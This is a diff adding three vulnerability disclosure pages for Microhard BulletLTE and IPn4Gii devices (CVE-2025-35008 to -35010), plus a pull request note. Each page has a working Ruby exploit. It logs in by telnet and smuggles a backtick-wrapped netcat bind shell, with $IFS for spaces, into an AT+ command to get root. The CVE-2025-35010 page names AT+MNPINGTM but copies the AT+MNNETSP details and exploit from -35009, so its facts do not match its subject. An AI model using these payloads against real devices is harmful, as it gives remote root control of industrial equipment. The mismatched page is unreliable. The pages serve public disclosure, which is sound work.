+If an attacker wraps input to the AT+MMNAME command in `$()` (dollar-parentheses) or backticks (which are tricky to render in Markdown!) they can put whatever command they want and it will be run as the root user. Note that spaces are not allowed, so $IFS must be used instead for space-delimited arguments for the command payload.
+
+The Ruby script below effectively demonstrates an attack using [CVE-2025-35008] as a proof-of-concept:
+
+```ruby
+#!/usr/bin/env ruby
+require 'net/telnet'
+require 'io/console'
+
+if !ARGV[0]
+  puts "usage: #{$0} <ip> [<username> <password>]"
+  exit(1)
+end
+
+target = ARGV[0]
+if ARGV[1] && ARGV[2]
+  user = ARGV[1]
+  pass = ARGV[2]
+else
+  printf("user: ")
+  user = STDIN.gets.chomp
+  printf("pass: ")
+  pass = STDIN.noecho(&:gets).chomp
+  puts ""
+end
+
+telnet = Net::Telnet::new("Host" => target, "Timeout" => 2, "Prompt" => /^\w+>/)
+telnet.login(user,pass) {|c| print c}
+begin
+  telnet.cmd("at+mmname=`nc$IFS-lvp$IFS\\4444$IFS-e$IFS/bin/sh$IFS-i`") {|c| print c}
+rescue
+  puts "shell spawned on #{ARGV[0]}:4444"
+  pid = spawn("nc -v #{ARGV[0]} 4444")
+  Process.wait pid
+end
+
+telnet.close
+```
+
+# Attacker Value
+
+If an attacker has a valid credential to the affected Microhard device, and the means to login (for example, over telnet), that attacker can leverage this vulnerability to escape the restricted shell and elevate privileges to root. Industrial control systems (ICS) are often deployed with easy to guess or default credentials, which could be used in conjunction with [CVE-2025-35008] to achieve complete, root-level remote control over affected devices.
+
+# Credit
+
+This vulnerability was discovered and documented by Ricky "HeadlessZeke" Lawshae of Keysight.
+
+# Timeline
+
+* 2025-03-27 (Thu): Presented at regularly scheduled AHA! meeting 0x00df
+* 2025-04-02 (Wed): Contact initiated to several guessed email aliases, such as info@microhardcorp.com,  support@microhardcorp.com, etc.
+* 2025-04-02 (Wed): Bounces collected from media@, press@, security@, and secure@. No bounce notification was generated from info@ and support@, though a customer account was required to further communicate with support@, which [AHA!] does not have.
+* 2025 (April and May): No further communication from the vendor was received.
+* 2025-06-08 (Sun): Verified current IPn4Gii/BulletLTE [firmware] remains at v1.2.0-r1132 
+* 2025-06-08 (Sun): Public disclosure of [CVE-2025-35008]
+
+----
+
+[AHA!]: https://takeonme.org
+[disclosure policy]: https://takeonme.org/cve.html
+[CVE-2025-35008]: https://www.cve.org/CVERecord?id=CVE-2025-35008
+[BulletLTE-NA2]: https://www.microhardcorp.com/BulletLTE-NA2.php
+[IPn4Gii-NA2]: https://www.microhardcorp.com/IPn4Gii-NA2.php
+[firmware]: https://support.microhardcorp.com/portal/en/kb/articles/ipn4gii-bullet-lte-firmware

--- a/content/cves/CVE-2025-35009.md
+++ b/content/cves/CVE-2025-35009.md
@@ -1,0 +1,103 @@
+---
+title: CVE-2025-35009
+aliases:
+  - /cves/CVE-2025-35009.html
+---
+
+# CVE-2025-35009: Microhard Bullet-LTE and IPn4Gii AT+MNNETSP Argument Injection
+
+[AHA!] has discovered an issue with multiple Microhard products, and is issuing this disclosure in accordance with AHA!'s standard [disclosure policy] on June 8, 2025. [CVE-2025-35009] has been assigned to this issue.
+
+Any questions about this disclosure should be directed to cve@takeonme.org.
+
+# Executive Summary
+
+Products that incorporate the Microhard [BulletLTE-NA2] and [IPn4Gii-NA2] are vulnerable to a post-authentication command injection issue that can lead to privilege escalation. This is an instance of [CWE-88](https://cwe.mitre.org/data/definitions/88.html), "Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')," and is estimated as a CVSS [7.1](https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).
+
+# Technical Details
+
+A command injection vulnerability exists within the AT+MNNETSP command in the restricted CLI interface of multiple Microhard products. Authentication is required to exploit this vulnerability in that you must have a user account to access the CLI via telnet. However, the service is running as root, so injecting commands allows an attacker to escape the restricted shell and elevate privileges for full access.
+
+The [firmware] for affected devices contains the binary `/bin/clitest`, which handles the restricted CLI interface. It is reachable via telnet or ssh connection.  It allows the user to run certain config commands as well as AT+ commands to interact with the Quectel modem. One of these AT+ commands is AT+MNNETSP which is used to check network performance against an external server. User input supplied to the cmd_netperf_speed() function in param_3 and is used as an argument for the /usr/bin/speedtest.sh script which is called via system():
+
+
+```
+undefined4 cmd_netperf_speed(undefined4 param_1,undefined4 param_2,char **param_3,int param_4)
+{
+    ...
+  cli_print(param_1,"Netperf is running, please wait......\n");
+  memset(acStack_268,0,0x40);
+  strcpy(acStack_268,"cat /dev/null > /var/run/speedtestlog");
+  system(acStack_268);
+  memset(acStack_268,0,0x40);
+  sprintf(acStack_268,"/bin/sh /usr/bin/speedtest.sh %s > /var/run/speedtestlog",acStack_228);
+  system(acStack_268);
+  memset(acStack_268,0,0x40);
+    ...
+}
+```
+
+If an attacker wraps input to the AT+MNNETSP command in `$()` (dollar-parentheses) or backticks (which are tricky to render in Markdown!) they can put whatever command they want and it will be run as the root user. Note that spaces are not allowed, so $IFS must be used instead for space-delimited arguments for the command payload.
+
+The Ruby script below effectively demonstrates an attack using [CVE-2025-35009] as a proof-of-concept:
+
+```ruby
+#!/usr/bin/env ruby
+require 'net/telnet'
+require 'io/console'
+
+if !ARGV[0]
+  puts "usage: #{$0} <ip> [<username> <password>]"
+  exit(1)
+end
+
+target = ARGV[0]
+if ARGV[1] && ARGV[2]
+  user = ARGV[1]
+  pass = ARGV[2]
+else
+  printf("user: ")
+  user = STDIN.gets.chomp
+  printf("pass: ")
+  pass = STDIN.noecho(&:gets).chomp
+  puts ""
+end
+
+telnet = Net::Telnet::new("Host" => target, "Timeout" => 2, "Prompt" => /^\w+>/)
+telnet.login(user,pass) {|c| print c}
+begin
+  telnet.cmd("at+mnnetsp=4,`nc$IFS-lvp$IFS\\4444$IFS-e$IFS/bin/sh$IFS-i`") {|c| print c}
+rescue
+  puts "shell spawned on #{ARGV[0]}:4444"
+  pid = spawn("nc -v #{ARGV[0]} 4444")
+  Process.wait pid
+end
+
+telnet.close
+```
+
+# Attacker Value
+
+If an attacker has a valid credential to the affected Microhard device, and the means to login (for example, over telnet), that attacker can leverage this vulnerability to escape the restricted shell and elevate privileges to root. Industrial control systems (ICS) are often deployed with easy to guess or default credentials, which could be used in conjunction with [CVE-2025-35009] to achieve complete, root-level remote control over affected devices.
+
+# Credit
+
+This vulnerability was discovered and documented by Ricky "HeadlessZeke" Lawshae of Keysight.
+
+# Timeline
+
+* 2025-03-27 (Thu): Presented at regularly scheduled AHA! meeting 0x00df
+* 2025-04-02 (Wed): Contact initiated to several guessed email aliases, such as info@microhardcorp.com,  support@microhardcorp.com, etc.
+* 2025-04-02 (Wed): Bounces collected from media@, press@, security@, and secure@. No bounce notification was generated from info@ and support@, though a customer account was required to further communicate with support@, which [AHA!] does not have.
+* 2025 (April and May): No further communication from the vendor was received.
+* 2025-06-08 (Sun): Verified current IPn4Gii/BulletLTE [firmware] remains at v1.2.0-r1132 
+* 2025-06-08 (Sun): Public disclosure of [CVE-2025-35009]
+
+----
+
+[AHA!]: https://takeonme.org
+[disclosure policy]: https://takeonme.org/cve.html
+[CVE-2025-35009]: https://www.cve.org/CVERecord?id=CVE-2025-35009
+[BulletLTE-NA2]: https://www.microhardcorp.com/BulletLTE-NA2.php
+[IPn4Gii-NA2]: https://www.microhardcorp.com/IPn4Gii-NA2.php
+[firmware]: https://support.microhardcorp.com/portal/en/kb/articles/ipn4gii-bullet-lte-firmware

--- a/content/cves/CVE-2025-35010.md
+++ b/content/cves/CVE-2025-35010.md
@@ -1,0 +1,103 @@
+---
+title: CVE-2025-35010
+aliases:
+  - /cves/CVE-2025-35010.html
+---
+
+# CVE-2025-35010: Microhard Bullet-LTE and IPn4Gii AT+MNPINGTM Argument Injection
+
+[AHA!] has discovered an issue with multiple Microhard products, and is issuing this disclosure in accordance with AHA!'s standard [disclosure policy] on June 8, 2025. [CVE-2025-35010] has been assigned to this issue.
+
+Any questions about this disclosure should be directed to cve@takeonme.org.
+
+# Executive Summary
+
+Products that incorporate the Microhard [BulletLTE-NA2] and [IPn4Gii-NA2] are vulnerable to a post-authentication command injection issue that can lead to privilege escalation. This is an instance of [CWE-88](https://cwe.mitre.org/data/definitions/88.html), "Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')," and is estimated as a CVSS [7.1](https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).
+
+# Technical Details
+
+A command injection vulnerability exists within the AT+MNPINGTM command in the restricted CLI interface of multiple Microhard products. Authentication is required to exploit this vulnerability in that you must have a user account to access the CLI via telnet. However, the service is running as root, so injecting commands allows an attacker to escape the restricted shell and elevate privileges for full access.
+
+The [firmware] for affected devices contains the binary `/bin/clitest`, which handles the restricted CLI interface. It is reachable via telnet or ssh connection.  It allows the user to run certain config commands as well as AT+ commands to interact with the Quectel modem. One of these AT+ commands is AT+MNNETSP which is used to check network performance against an external server. User input supplied to the cmd_netperf_speed() function in param_3 and is used as an argument for the /usr/bin/speedtest.sh script which is called via system():
+
+
+```
+undefined4 cmd_netperf_speed(undefined4 param_1,undefined4 param_2,char **param_3,int param_4)
+{
+    ...
+  cli_print(param_1,"Netperf is running, please wait......\n");
+  memset(acStack_268,0,0x40);
+  strcpy(acStack_268,"cat /dev/null > /var/run/speedtestlog");
+  system(acStack_268);
+  memset(acStack_268,0,0x40);
+  sprintf(acStack_268,"/bin/sh /usr/bin/speedtest.sh %s > /var/run/speedtestlog",acStack_228);
+  system(acStack_268);
+  memset(acStack_268,0,0x40);
+    ...
+}
+```
+
+If an attacker wraps input to the AT+MNPINGTM command in `$()` (dollar-parentheses) or backticks (which are tricky to render in Markdown!) they can put whatever command they want and it will be run as the root user. Note that spaces are not allowed, so $IFS must be used instead for space-delimited arguments for the command payload.
+
+The Ruby script below effectively demonstrates an attack using [CVE-2025-35010] as a proof-of-concept:
+
+```ruby
+#!/usr/bin/env ruby
+require 'net/telnet'
+require 'io/console'
+
+if !ARGV[0]
+  puts "usage: #{$0} <ip> [<username> <password>]"
+  exit(1)
+end
+
+target = ARGV[0]
+if ARGV[1] && ARGV[2]
+  user = ARGV[1]
+  pass = ARGV[2]
+else
+  printf("user: ")
+  user = STDIN.gets.chomp
+  printf("pass: ")
+  pass = STDIN.noecho(&:gets).chomp
+  puts ""
+end
+
+telnet = Net::Telnet::new("Host" => target, "Timeout" => 2, "Prompt" => /^\w+>/)
+telnet.login(user,pass) {|c| print c}
+begin
+  telnet.cmd("at+mnnetsp=4,`nc$IFS-lvp$IFS\\4444$IFS-e$IFS/bin/sh$IFS-i`") {|c| print c}
+rescue
+  puts "shell spawned on #{ARGV[0]}:4444"
+  pid = spawn("nc -v #{ARGV[0]} 4444")
+  Process.wait pid
+end
+
+telnet.close
+```
+
+# Attacker Value
+
+If an attacker has a valid credential to the affected Microhard device, and the means to login (for example, over telnet), that attacker can leverage this vulnerability to escape the restricted shell and elevate privileges to root. Industrial control systems (ICS) are often deployed with easy to guess or default credentials, which could be used in conjunction with [CVE-2025-35010] to achieve complete, root-level remote control over affected devices.
+
+# Credit
+
+This vulnerability was discovered and documented by Ricky "HeadlessZeke" Lawshae of Keysight.
+
+# Timeline
+
+* 2025-03-27 (Thu): Presented at regularly scheduled AHA! meeting 0x00df
+* 2025-04-02 (Wed): Contact initiated to several guessed email aliases, such as info@microhardcorp.com,  support@microhardcorp.com, etc.
+* 2025-04-02 (Wed): Bounces collected from media@, press@, security@, and secure@. No bounce notification was generated from info@ and support@, though a customer account was required to further communicate with support@, which [AHA!] does not have.
+* 2025 (April and May): No further communication from the vendor was received.
+* 2025-06-08 (Sun): Verified current IPn4Gii/BulletLTE [firmware] remains at v1.2.0-r1132 
+* 2025-06-08 (Sun): Public disclosure of [CVE-2025-35010]
+
+----
+
+[AHA!]: https://takeonme.org
+[disclosure policy]: https://takeonme.org/cve.html
+[CVE-2025-35010]: https://www.cve.org/CVERecord?id=CVE-2025-35010
+[BulletLTE-NA2]: https://www.microhardcorp.com/BulletLTE-NA2.php
+[IPn4Gii-NA2]: https://www.microhardcorp.com/IPn4Gii-NA2.php
+[firmware]: https://support.microhardcorp.com/portal/en/kb/articles/ipn4gii-bullet-lte-firmware


### PR DESCRIPTION
It annoyed me that the CVE IDs were getting wrapped in our published table, so I stopped that.

Also, chunked up the CVE table into years, now that we've been at this for a little while.

It all looks lovely in my local Hugo test env.

Finally, added entries for a bunch of new chipset vulns from @headlesszeke (see private repo issues https://github.com/AustinHackers/disclosures/issues/13 and https://github.com/AustinHackers/disclosures/issues/14). 

Keeping the details out until right about 5pm today, but a couple hours of RBPs in a pull request shouldn't bother anyone none. Don't land that until the content commit shows up.

Thanks @headlesszeke!
